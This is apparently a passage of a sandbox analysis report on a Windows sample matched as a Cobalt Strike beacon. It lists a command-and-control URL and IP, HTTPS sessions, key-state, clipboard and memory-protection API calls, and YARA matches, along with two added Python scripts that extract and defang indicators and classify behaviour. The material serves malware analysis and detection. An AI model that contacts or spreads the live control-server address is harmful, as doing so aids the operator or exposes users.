Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.3099234815.000000000313D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://easthoolbook.com/Gs
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2931428688.000000000051B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://easthoolbook.com/Tj
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2781427971.000000000313D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://easthoolbook.com/bq
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.3261508325.000000000313D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://easthoolbook.com/ign.mpeg?dare=true
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2841533366.000000000313D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://easthoolbook.com/nr
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.3291723868.000000000313D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://easthoolbook.com/o
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2245388886.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2212647131.000000000051B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://easthoolbook.com/r
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2212647131.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2781427971.000000000313D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2212324717.00000000004DC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2334675503.00000000004B1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2364213906.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2396331476.000000000048A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2498019988.000000000051C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2438416359.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2395775873.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2304843739.000000000051B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://easthoolbook.com/sign.mpeg?dare=true
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2498019988.000000000051C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://easthoolbook.com/sign.mpeg?dare=true$j
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2275023579.00000000004DB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2334675503.00000000004E9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2931428688.00000000004E7000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2304843739.00000000004E9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2275111012.00000000004E7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://easthoolbook.com/sign.mpeg?dare=true%YE
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.3291723868.000000000313D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.3261508325.000000000313D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://easthoolbook.com/sign.mpeg?dare=true.0h
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2151387101.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2181259233.000000000051B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://easthoolbook.com/sign.mpeg?dare=true:d
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.3129143309.000000000313D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://easthoolbook.com/sign.mpeg?dare=trueGs
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2901567104.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2334675503.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2498019988.000000000051C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2438416359.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2304843739.000000000051B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://easthoolbook.com/sign.mpeg?dare=trueHj
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2468168029.000000000051B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://easthoolbook.com/sign.mpeg?dare=trueL
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000002.3314909007.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2438416359.000000000051B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://easthoolbook.com/sign.mpeg?dare=trueLj
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2364213906.00000000004E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://easthoolbook.com/sign.mpeg?dare=trueNx
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2275023579.000000000051C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2468168029.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2181259233.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2334675503.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2245388886.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2212647131.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2364213906.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2498019988.000000000051C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2438416359.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2395775873.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2304843739.000000000051B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://easthoolbook.com/sign.mpeg?dare=trueProvider
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2901567104.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2931428688.000000000051B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://easthoolbook.com/sign.mpeg?dare=trueProviderLj
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2468168029.000000000051B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://easthoolbook.com/sign.mpeg?dare=trueTj
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2151387101.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2181259233.000000000051B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://easthoolbook.com/sign.mpeg?dare=truebd8
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000002.3314909007.0000000000459000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://easthoolbook.com/sign.mpeg?dare=truedll
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2304843739.00000000004B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://easthoolbook.com/sign.mpeg?dare=truephic
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2781427971.000000000313D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://easthoolbook.com/sign.mpeg?dare=truesrP
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2395775873.00000000004E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://easthoolbook.com/sign.mpeg?dare=truet
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2245388886.00000000004E8000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2212647131.00000000004E8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://easthoolbook.com/sign.mpeg?dare=truezY
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2275023579.00000000004B1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2304843739.00000000004B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://easthoolbook.com/v
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49701
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown HTTPS traffic detected: 89.150.57.46:443 -> 192.168.2.6:49699 version: TLS 1.2
Source: unknown HTTPS traffic detected: 89.150.57.46:443 -> 192.168.2.6:49746 version: TLS 1.2
Source: unknown HTTPS traffic detected: 89.150.57.46:443 -> 192.168.2.6:49748 version: TLS 1.2
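The network lines above are what a responder turns into indicators. The script below is an added example written for this page, not part of the sandbox or its report tooling. It parses the three line shapes above (URL strings found in memory dumps, per-flow port pairs, and TLS session lines), defangs the results, and counts distinct ephemeral client ports, which for a beacon talking to one C2 approximates the number of check-ins during the run (the full listing above contains 40 distinct client ports between 49699 and 49748). The input is a constructed excerpt of the lines above. The URL strings are kept verbatim; the trailing characters ("zY", "/v") may be adjacent memory bytes rather than part of the URL, which is an assumption, so only the hostname is treated as a clean indicator.

```python
"""Pull network indicators out of sandbox report lines.

Added example for this report; it is not the sandbox's own tooling. It handles
the three line shapes in the report: URL strings from memory, per-flow port
pairs, and TLS session lines.
"""
import re
from urllib.parse import urlsplit

# Constructed excerpt of the report's network lines (a handful of the ~80).
SAMPLE_LINES = """\
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2245388886.00000000004E8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://easthoolbook.com/sign.mpeg?dare=truezY
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2275023579.00000000004B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://easthoolbook.com/v
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown HTTPS traffic detected: 89.150.57.46:443 -> 192.168.2.6:49699 version: TLS 1.2
Source: unknown HTTPS traffic detected: 89.150.57.46:443 -> 192.168.2.6:49746 version: TLS 1.2
"""

URL_RE = re.compile(r"String found in binary or memory: (https?://\S+)")
PORTS_RE = re.compile(r"HTTP traffic on port (\d+) -> (\d+)")
TLS_RE = re.compile(
    r"HTTPS traffic detected: ([\d.]+):(\d+) -> ([\d.]+):(\d+) version: (TLS [\d.]+)")


def defang(indicator: str) -> str:
    """hxxps://host[.]tld/... form for tickets and chat; bare hosts/IPs get [.] only."""
    if "://" not in indicator:
        return indicator.replace(".", "[.]")
    p = urlsplit(indicator)
    query = f"?{p.query}" if p.query else ""
    return f"{p.scheme.replace('http', 'hxxp')}://{p.netloc.replace('.', '[.]')}{p.path}{query}"


def extract_iocs(text: str) -> dict:
    urls, hosts, servers, tls_versions, client_ports = [], set(), set(), set(), set()
    for line in text.splitlines():
        if m := URL_RE.search(line):
            # Kept verbatim: trailing bytes such as "zY" may be adjacent memory
            # rather than part of the URL, so only the hostname is a clean IOC.
            urls.append(m.group(1))
            hosts.add(urlsplit(m.group(1)).hostname)
        elif m := PORTS_RE.search(line):
            # Both directions of one flow are listed. Windows hands out client
            # ports from 49152 upward, so the higher number is the client side.
            a, b = int(m.group(1)), int(m.group(2))
            client_ports.add(max(a, b))
        elif m := TLS_RE.search(line):
            servers.add((m.group(1), int(m.group(2))))
            client_ports.add(int(m.group(4)))
            tls_versions.add(m.group(5))
    return {
        "urls": urls,
        "hosts": sorted(h for h in hosts if h),
        "servers": sorted(servers),
        "tls_versions": sorted(tls_versions),
        # Each distinct client port is one TCP session; for a beacon talking to
        # a single C2 this approximates the number of check-ins during the run.
        "session_count": len(client_ports),
        "client_port_range": (min(client_ports), max(client_ports)) if client_ports else None,
    }


def report(iocs: dict) -> list[str]:
    lines = [f"url    {defang(u)}" for u in iocs["urls"]]
    lines += [f"host   {defang(h)}" for h in iocs["hosts"]]
    lines += [f"server {defang(ip)}:{port}" for ip, port in iocs["servers"]]
    lines.append(f"tls    {', '.join(iocs['tls_versions']) or 'n/a'}")
    lines.append(f"sessions {iocs['session_count']} (client ports {iocs['client_port_range']})")
    return lines


if __name__ == "__main__":
    print("\n".join(report(extract_iocs(SAMPLE_LINES))))
```

Run it against the whole report text instead of the excerpt to get the full session count; the port-pair lines are labelled "HTTP" by the sandbox, but the TLS lines show the same flows are TLS 1.2 to 443, so the URL paths are only recoverable from the memory strings, not from the wire.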
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_0000000140145214 SrcHashImpl::SrcHashImpl,CreateCompatibleDC,CreateCompatibleBitmap,FillRect,OpenClipboard,EmptyClipboard,CloseClipboard,SetClipboardData,CloseClipboard, 0_2_0000000140145214
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_0000000140158178 GetAsyncKeyState, 0_2_0000000140158178
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_00000001400B4288 GetKeyState,GetKeyState,GetKeyState,GetParent,GetParent,SendMessageW,ScreenToClient,GetCursorPos,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetWindowPos,SendMessageW,SendMessageW,GetParent, 0_2_00000001400B4288
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_000000014013D824 GetKeyState,GetKeyState,GetKeyState, 0_2_000000014013D824
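The call-chain lines above are the evidence behind the report's behaviour signatures. As an added example (my own code, not the sandbox's rule set, which the page does not publish), the script below parses "Code function: <id> <api>,... <id>" lines and applies a few plain rules of that kind. Two caveats it encodes: the clipboard chain above (OpenClipboard, EmptyClipboard, SetClipboardData) writes the clipboard rather than reading it, so read and write are kept as separate rules; and repeated GetKeyState calls next to SendMessageW/SetWindowPos are ordinary GUI input handling, so hits in that context are flagged as low confidence rather than taken as a keylogger on their own. The input is a constructed excerpt of call-chain lines taken from across this report; the rule names and thresholds are mine.

```python
"""Turn the report's per-function API call chains into behaviour signatures.

Added example for this report, not the sandbox's own rule set (which the page
does not publish). Rule names and thresholds here are my own.
"""
import re

# Constructed excerpt: call-chain lines copied from across this report, plus
# one of the many functions the report lists with no recorded calls.
SAMPLE = r"""
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_0000000140145214 SrcHashImpl::SrcHashImpl,CreateCompatibleDC,CreateCompatibleBitmap,FillRect,OpenClipboard,EmptyClipboard,CloseClipboard,SetClipboardData,CloseClipboard, 0_2_0000000140145214
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_0000000140158178 GetAsyncKeyState, 0_2_0000000140158178
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_00000001400B4288 GetKeyState,GetKeyState,GetKeyState,GetParent,GetParent,SendMessageW,ScreenToClient,GetCursorPos,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetWindowPos,SendMessageW,SendMessageW,GetParent, 0_2_00000001400B4288
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_000000014013D824 GetKeyState,GetKeyState,GetKeyState, 0_2_000000014013D824
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_3_01FC0020 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtProtectVirtualMemory, 0_3_01FC0020
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_0000000140054158 GetVersionExW,wcschr,CoInitializeEx,CoCreateInstance, 0_2_0000000140054158
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_00000001400757A8 0_2_00000001400757A8
"""

# "<id> <api>,<api>,..., <id>"; the call list is absent for functions with no
# recorded API calls.
CHAIN_RE = re.compile(r"Code function: (?P<id>\S+)(?: (?P<calls>.*?),)? (?P=id)$")

# Windowing APIs that make repeated key-state reads look like normal UI code.
GUI_APIS = {"SendMessageW", "SetWindowPos", "GetParent", "ScreenToClient", "GetCursorPos"}

# (signature name, predicate over the ordered call list). Plain functions so a
# rule can look at counts and order, not just presence.
RULES = [
    ("keystroke polling",
     lambda c: "GetAsyncKeyState" in c or c.count("GetKeyState") >= 2),
    ("clipboard read",
     lambda c: "OpenClipboard" in c and "GetClipboardData" in c),
    ("clipboard write",
     lambda c: "OpenClipboard" in c and "SetClipboardData" in c),
    ("native memory alloc + protect change",
     lambda c: {"NtAllocateVirtualMemory", "NtProtectVirtualMemory"} <= set(c)),
    ("COM object instantiation",
     lambda c: {"CoInitializeEx", "CoCreateInstance"} <= set(c)),
]


def parse_call_chains(text: str) -> dict[str, list[str]]:
    """Map function id -> ordered list of API names recorded for it."""
    chains = {}
    for line in text.splitlines():
        m = CHAIN_RE.search(line)
        if not m:
            continue
        calls = m["calls"] or ""
        chains[m["id"]] = [c.strip() for c in calls.split(",") if c.strip()]
    return chains


def classify(chains: dict[str, list[str]]) -> dict[str, dict]:
    """Functions that trigger at least one rule, with a flag for GUI context."""
    findings = {}
    for fid, calls in chains.items():
        matched = [name for name, pred in RULES if pred(calls)]
        if matched:
            findings[fid] = {"capabilities": matched,
                             "gui_context": bool(GUI_APIS & set(calls))}
    return findings


if __name__ == "__main__":
    for fid, f in classify(parse_call_chains(SAMPLE)).items():
        ctx = " [GUI context: low confidence]" if f["gui_context"] else ""
        print(f"{fid}: {', '.join(f['capabilities'])}{ctx}")
```

The rules deliberately work on the ordered call list rather than a set, so a rule can require a count (two or more GetKeyState reads in one function) or, if extended, an order (allocate before protect); that is the difference between this and a plain import-table scan.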

System Summary

Source: 0.3.SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe.2050000.0.unpack, type: UNPACKEDPE Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 0.3.SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe.2050000.0.unpack, type: UNPACKEDPE Matched rule: Rule for beacon sleep obfuscation routine Author: unknown
Source: 00000000.00000002.3315857206.00000000020D5000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 00000000.00000002.3315857206.00000000020D5000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Rule for beacon sleep obfuscation routine Author: unknown
Source: 00000000.00000003.2073190217.0000000002068000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 00000000.00000003.2073190217.0000000002068000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 00000000.00000003.2073190217.0000000002068000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Rule for beacon sleep obfuscation routine Author: unknown
Source: 00000000.00000002.3315812932.00000000020A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: Process Memory Space: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe PID: 6516, type: MEMORYSTR Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_3_01FC0020 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtProtectVirtualMemory, 0_3_01FC0020
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_3_01FC11E0 0_3_01FC11E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_3_01FC47C9 0_3_01FC47C9
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_3_01FC6A45 0_3_01FC6A45
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_00000001400757A8 0_2_00000001400757A8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_0000000140093FEC 0_2_0000000140093FEC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_00000001401AC024 0_2_00000001401AC024
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_000000014016009C 0_2_000000014016009C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_0000000140054158 0_2_0000000140054158
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_000000014013C149 0_2_000000014013C149
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_00000001401741F8 0_2_00000001401741F8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_00000001401781F4 0_2_00000001401781F4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_00000001400BC26C 0_2_00000001400BC26C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_00000001400FC280 0_2_00000001400FC280
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_00000001400B4288 0_2_00000001400B4288
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_00000001400802B4 0_2_00000001400802B4
